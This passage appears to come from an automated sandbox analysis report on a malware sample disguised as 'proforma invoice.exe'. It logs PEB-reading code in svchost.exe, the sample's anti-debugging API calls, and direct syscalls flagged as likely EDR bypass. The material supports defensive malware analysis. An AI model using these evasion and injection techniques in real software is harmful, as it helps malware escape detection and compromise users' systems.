            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]1_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]1_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]1_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]1_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]1_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]1_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]1_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]1_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]1_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]1_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]1_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]1_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]1_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]1_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]1_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]1_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]1_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]1_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]1_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]1_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]1_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]1_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]1_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]1_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]1_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]1_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]1_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]1_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]1_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]1_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03242840 mov ecx, dword ptr fs:[00000030h]1_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260854 mov eax, dword ptr fs:[00000030h]1_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234859 mov eax, dword ptr fs:[00000030h]1_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230887 mov eax, dword ptr fs:[00000030h]1_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC89D mov eax, dword ptr fs:[00000030h]1_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA8E4 mov eax, dword ptr fs:[00000030h]1_2_032FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C8F9 mov eax, dword ptr fs:[00000030h]1_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C8F9 mov eax, dword ptr fs:[00000030h]1_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E8C0 mov eax, dword ptr fs:[00000030h]1_2_0325E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EF28 mov eax, dword ptr fs:[00000030h]1_2_0325EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E6F00 mov eax, dword ptr fs:[00000030h]1_2_032E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232F12 mov eax, dword ptr fs:[00000030h]1_2_03232F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CF1F mov eax, dword ptr fs:[00000030h]1_2_0326CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325AF69 mov eax, dword ptr fs:[00000030h]1_2_0325AF69
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC083F
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC09D5 SetUnhandledExceptionFilter,0_2_00AC09D5
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtClose: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
